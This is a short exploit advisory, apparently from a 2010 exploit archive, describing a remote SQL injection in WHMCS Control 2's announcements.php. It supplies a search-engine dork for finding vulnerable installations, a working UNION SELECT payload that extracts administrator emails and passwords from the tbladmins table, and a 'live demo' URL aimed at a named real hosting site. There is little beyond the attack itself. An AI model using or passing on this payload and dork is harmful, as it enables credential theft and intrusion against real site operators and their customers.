WHMCS Control version 2 suffers from a remote SQL injection vulnerability.
a47bae4ee51b1b827b7366b1246011f700dc3e7eb9415d67287c982c3eb01918
Software: WHMCS control 2 Sql Injection
Vulnerability: Remote Sql Injection
Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS or' announcements.php
Off. site: www.MiXaTy.com
Author
Author: Islam DefenDers
Date: 2.5.2010
Contact: email: hackereg@hotmail.com
Sql Injection
Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--
DOWNLOAD : http://www.whmcs.com/
Live demo: http://www.jsr-host.com/announcements.php?id=1%27%20and%201=0%20union%20all%20select%201,2,concat%28email,0x3d,password%29,username,5%20from%20tbladmins--
Greetz
IsLam DefenDers Mr.HaMaDa
HaMaDa SCoOoRPioN
site: www.mixaty.com
E: hackereg@hotmail.com
_________________________________________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free.
https://signup.live.com/signup.aspx?id=60969